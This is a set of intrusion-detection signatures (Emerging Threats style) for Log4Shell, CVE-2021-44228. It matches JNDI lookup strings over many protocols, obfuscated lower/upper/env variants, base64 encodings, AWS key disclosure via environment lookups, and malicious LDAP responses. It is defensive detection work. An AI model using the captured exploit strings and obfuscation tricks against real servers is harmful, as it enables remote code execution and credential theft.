alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt (tcp nds) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|nds|3a|"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034712; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt (udp nds) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|nds|3a|"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034713; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt (tcp corba) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|corba|3a|"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034714; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt (udp corba) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|corba|3a|"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034715; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt - Base64 jndi (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|base64|3a|JHtqbmRp"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034716; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt - Base64 jndi (CVE-2021-44228)"; content:"|24 7b|base64|3a|JHtqbmRp"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034717; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)
alert tcp $EXTERNAL_NET any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET ATTACK_RESPONSE Possible CVE-2021-44228 Payload via LDAPv3 Response"; flow:established,to_client; content:"|30 81|"; startswith; content:"|02 01|"; distance:1; within:2; content:"|64|"; distance:1; within:1; content:"|04|"; distance:2; within:1; byte_jump:1,0,relative; content:"|04 0d|javaClassName"; within:20; fast_pattern; content:"|04|"; distance:2; within:1; byte_jump:1,0,relative; content:"|04 0c|javaCodeBase"; within:19; content:"|04|"; distance:2; within:1; byte_jump:1,0,relative; content:"|04 0b|objectClass"; within:18; content:"|04|"; distance:2; within:1; byte_jump:1,0,relative; content:"|04 0b|javaFactory"; within:18; reference:url,ldap.com/ldapv3-wire-protocol-reference-ldap-result/; reference:url,ldap.com/ldapv3-wire-protocol-reference-search/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034722; rev:1; metadata:attack_target Client_and_Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, former_category ATTACK_RESPONSE, signature_severity Major, updated_at 2021_12_14;)
alert dns $HOME_NET any -> any any (msg:"ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Payload Domain (rce .ee)"; dns.query; dotprefix; content:".rce.ee"; nocase; endswith; reference:url,www.fastly.com/blog/new-data-and-insights-into-log4shell-attacks-cve-2021-44228; reference:cve,2021-44228; classtype:domain-c2; sid:2034747; rev:1; metadata:attack_target Client_and_Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, signature_severity Major, updated_at 2021_12_17;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed M2 (CVE-2021-44228)"; flow:established,to_server; stream_size:client,<,10000; content:"|24 7b|"; content:"|24 7b 3a 3a|"; distance:0; within:300; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034673; rev:2; metadata:attack_target Server, created_at 2021_12_12, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert http $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http ldap) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldap|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day; reference:cve,2021-44228; classtype:attempted-admin; sid:2034757; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert http $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http rmi) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|rmi|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day; reference:cve,2021-44228; classtype:attempted-admin; sid:2034758; rev:1; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert http $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldap|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day; reference:cve,2021-44228; classtype:attempted-admin; sid:2034759; rev:1; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|rmi|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day; reference:cve,2021-44228; classtype:attempted-admin; sid:2034760; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert udp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (Outbound) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|ldap|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day; reference:cve,2021-44228; classtype:attempted-admin; sid:2034761; rev:1; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert udp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (Outbound) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|rmi|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day; reference:cve,2021-44228; classtype:attempted-admin; sid:2034762; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert udp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp dns) (Outbound) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|dns|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day; reference:cve,2021-44228; classtype:attempted-admin; sid:2034763; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp dns) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|dns|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day; reference:cve,2021-44228; classtype:attempted-admin; sid:2034764; rev:1; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert http $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http dns) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|dns|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day; reference:cve,2021-44228; classtype:attempted-admin; sid:2034765; rev:1; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert udp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp ldaps) (Outbound) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|ldaps|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day; reference:cve,2021-44228; classtype:attempted-admin; sid:2034766; rev:1; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldaps|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day; reference:cve,2021-44228; classtype:attempted-admin; sid:2034767; rev:1; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert http $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http ldaps) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldaps|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day; reference:cve,2021-44228; classtype:attempted-admin; sid:2034768; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache Obfuscated log4j RCE Attempt (tcp ldap) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b 24 7b|env|3a|NaN|3a|-j|7d|ndi|24 7b|env|3a|NaN|3a|"; nocase; fast_pattern; content:"|24 7b|env|3a|NaN|3a|-l|7d|dap|24|"; reference:url,twitter.com/bad_packets/status/1471253695459332102; reference:cve,2021-44228; classtype:attempted-admin; sid:2034755; rev:1; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, former_category EXPLOIT, signature_severity Major, updated_at 2021_12_17;)
alert udp $HOME_NET any -> any any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt - Base64 jndi (Outbound)
(CVE-2021-44228) "; content:"|24 7b|base64|3a|JHtqbmRp"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034750; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;) alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt - Base64 jndi (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|base64|3a|JHtqbmRp"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034751; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;) alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass M1 (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"%7bjndi%3a"; nocase; fast_pattern; pcre:"/^(l|r|d|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(l|r|d)(\x7d|%7d))(d|n|m|(\x24|%24)(\x7b|%24)(lower|upper)(\x3a|%3a)(d|n|m)(\x7d|%7d))(a|i|s|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(a|i|s)(\x7d|%7d))(p|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)p(\x7d|%7d))/Ri"; reference:cve,2021-44228; classtype:attempted-admin; sid:2034781; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;) alert udp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass M1 (Outbound) (CVE-2021-44228)"; content:"%7bjndi%3a"; nocase; fast_pattern; 
pcre:"/^(l|r|d|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(l|r|d)(\x7d|%7d))(d|n|m|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(d|n|m)(\x7d|%7d))(a|i|s|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(a|i|s)(\x7d|%7d))(p|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)p(\x7d|%7d))/Ri"; reference:cve,2021-44228; classtype:attempted-admin; sid:2034782; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;) alert tcp $HOME_NET any -> any any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; content:"|3a 2f 2f|"; distance:0; within:20; reference:cve,2021-44228; classtype:misc-activity; sid:2034783; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category HUNTING, signature_severity Major, tag Exploit, updated_at 2021_12_17;) alert udp $HOME_NET any -> any any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (Outbound) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; content:"|3a 2f 2f|"; distance:0; within:20; reference:cve,2021-44228; classtype:misc-activity; sid:2034784; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category HUNTING, signature_severity Major, tag Exploit, updated_at 2021_12_17;) alert tcp $HOME_NET any -> any any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol upper Bypass (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; content:"|24 7b|upper|3a|"; distance:0; reference:cve,2021-44228; classtype:misc-activity; sid:2034785; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, 
deployment Perimeter, deployment Internal, former_category HUNTING, signature_severity Major, tag Exploit, updated_at 2021_12_17;) alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp iiop) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|iiop|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034787; rev:2; metadata:attack_target Client_and_Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;) alert udp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp iiop) (Outbound) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|iiop|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034788; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;) alert udp $HOME_NET any -> any any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt (udp corba) (Outbound) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|corba|3a|"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034789; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;) alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt (tcp corba) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|corba|3a|"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034790; rev:2; metadata:attack_target Client_and_Server, created_at 2021_12_17, cve 
CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;) alert udp $HOME_NET any -> any any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt (udp nds) (Outbound) (CVE-2021-44228) "; content:"|24 7b|jndi|3a|nds|3a|"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034791; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;) alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt (tcp nds) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|nds|3a|"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034792; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;) alert udp $HOME_NET any -> any any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt (udp nis) (Outbound) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|nis|3a|"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034793; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;) alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt (tcp nis) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|nis|3a|"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034794; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 
2021_12_17;) alert udp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt - Nested upper (udp) (Outbound) (CVE-2021-44228)"; content:"|24 7b 24 7b|upper|3a 24 7b|upper|3a|jndi"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034795; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;) alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt - Nested upper (tcp) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b 24 7b|upper|3a 24 7b|upper|3a|jndi"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034796; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;) alert udp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt - Nested lower (udp) (Outbound) (CVE-2021-44228)"; content:"|24 7b 24 7b|lower|3a 24 7b|lower|3a|jndi"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034797; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;) alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt - Nested lower (tcp) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b 24 7b|lower|3a 24 7b|lower|3a|jndi"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034798; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;) alert udp $HOME_NET any -> any any 
(msg:"ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass M2 (Outbound) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; pcre:"/^(l|r|d|\x24\x7b(lower|upper)\x3a(l|r|d)\x7d)(d|n|m|\x24\x7b(lower|upper)\x3a(d|n|m)\x7d)(a|i|s|\x24\x7b(lower|upper)\x3a(a|i|s)\x7d)(p|\x24\x7b(lower|upper)\x3a(p)\x7d)/Ri"; content:"|3a 2f 2f|"; distance:0; reference:cve,2021-44228; classtype:attempted-admin; sid:2034799; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;) alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass M2 (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; pcre:"/^(l|r|d|\x24\x7b(lower|upper)\x3a(l|r|d)\x7d)(d|n|m|\x24\x7b(lower|upper)\x3a(d|n|m)\x7d)(a|i|s|\x24\x7b(lower|upper)\x3a(a|i|s)\x7d)(p|\x24\x7b(lower|upper)\x3a(p)\x7d)/Ri"; content:"|3a 2f 2f|"; distance:0; reference:cve,2021-44228; classtype:attempted-admin; sid:2034800; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_17;) alert udp $HOME_NET any -> any any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol upper Bypass (Outbound) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; content:"|24 7b|upper|3a|"; distance:0; reference:cve,2021-44228; classtype:misc-activity; sid:2034801; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category HUNTING, signature_severity Major, tag Exploit, updated_at 2021_12_18;) alert tcp $HOME_NET any -> any any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol lower Bypass (Outbound) 
(CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; content:"|24 7b|lower|3a|"; distance:0; reference:cve,2021-44228; classtype:misc-activity; sid:2034802; rev:2; metadata:attack_target Server, created_at 2021_12_18, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category HUNTING, signature_severity Major, tag Exploit, updated_at 2021_12_18;) alert udp $HOME_NET any -> any any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol lower Bypass (Outbound) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; content:"|24 7b|lower|3a|"; distance:0; reference:cve,2021-44228; classtype:misc-activity; sid:2034803; rev:2; metadata:attack_target Server, created_at 2021_12_18, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category HUNTING, signature_severity Major, tag Exploit, updated_at 2021_12_18;) alert udp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt - 2021/12/17 Obfuscation Observed (Outbound) (CVE-2021-44228)"; content:"%7b"; nocase; fast_pattern; pcre:"/^(j|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)j(\x7d|%7d)|(\x24|%24)(\x7b|%7b)(\x3a|%3a){1,2}\-j(\x7d|%7d))(n|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)n(\x7d|%7d)|(\x24|%24)(\x7b|%7b)(\x3a|%3a){1,2}\-n(\x7d|%7d))/Ri"; content:"|3a|"; distance:0; pcre:"/^(l|r|d|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(l|r|d)(\x7d|%7d)|(\x24|%24)(\x7b|%7b)(\x3a|%3a){1,2}\-(l|r|d)(\x7d|%7d))(d|n|m|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(d|n|m)(\x7d|%7d)|(\x24|%24)(\x7b|%7b)(\x3a|%3a){1,2}\-(d|n|m)(\x7d|%7d))(a|i|s|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(a|i|s)(\x7d|%7d)|(\x24|%24)(\x7b|%7b)(\x3a|%3a){1,2}\-(a|i|s)(\x7d|%7d))(p|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)p(\x7d|%7d))/Ri"; reference:cve,2021-44228; classtype:attempted-admin; sid:2034804; rev:2; metadata:attack_target Server, created_at 2021_12_18, cve CVE_2021_44228, deployment Perimeter, deployment Internal, 
former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_18;) alert udp $HOME_NET any -> any any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/17 Obfuscation Observed M2 (Outbound) (CVE-2021-44228)"; content:"|24 7b|"; content:"|24 7b 3a 3a|"; distance:0; within:300; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034805; rev:2; metadata:attack_target Server, created_at 2021_12_18, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_18;) alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/17 Obfuscation Observed (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|"; pcre:"/^(j|\x24\x7b(lower|upper)\x3aj\x7d|\x24\x7b\x3a\x3a\-j\x7d)(n|\x24\x7b(lower|upper)\x3an\x7d|\x24\x7b\x3a\x3a\-n\x7d)/Ri"; content:"|3a|"; distance:0; content:"|24 7b|env|3a|"; distance:0; reference:cve,2021-44228; classtype:attempted-admin; sid:2034806; rev:2; metadata:attack_target Server, created_at 2021_12_18, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_18;) alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt - AWS Access Key Disclosure (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|"; pcre:"/^(j|\x24\x7b(lower|upper)\x3aj\x7d|\x24\x7b\x3a\x3a\-j\x7d)(n|\x24\x7b(lower|upper)\x3an\x7d|\x24\x7b\x3a\x3a\-n\x7d)/Ri"; content:"|3a|"; distance:0; content:"|24 7b|env|3a|AWS_ACCESS_KEY_ID"; distance:0; reference:cve,2021-44228; classtype:attempted-admin; sid:2034807; rev:2; metadata:attack_target Server, created_at 2021_12_18, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_18;) alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT 
Possible Apache log4j RCE Attempt - 2021/12/17 Obfuscation Observed M2 (Outbound) (CVE-2021-44228)"; flow:established,to_server; stream_size:client,<,10000; content:"|24 7b|"; content:"|24 7b 3a 3a|"; distance:0; within:300; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034786; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_18;) alert tcp $EXTERNAL_NET any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET ATTACK_RESPONSE Possible CVE-2021-44228 Payload via LDAPv3 Response M2"; flow:established,to_client; content:"|30|"; startswith; content:"|04 0d|javaClassName"; fast_pattern; content:"|04|"; distance:2; within:1; byte_jump:1,0,relative; content:"|04 12|javaSerializedData"; within:25; content:"|ac ed|"; within:10; 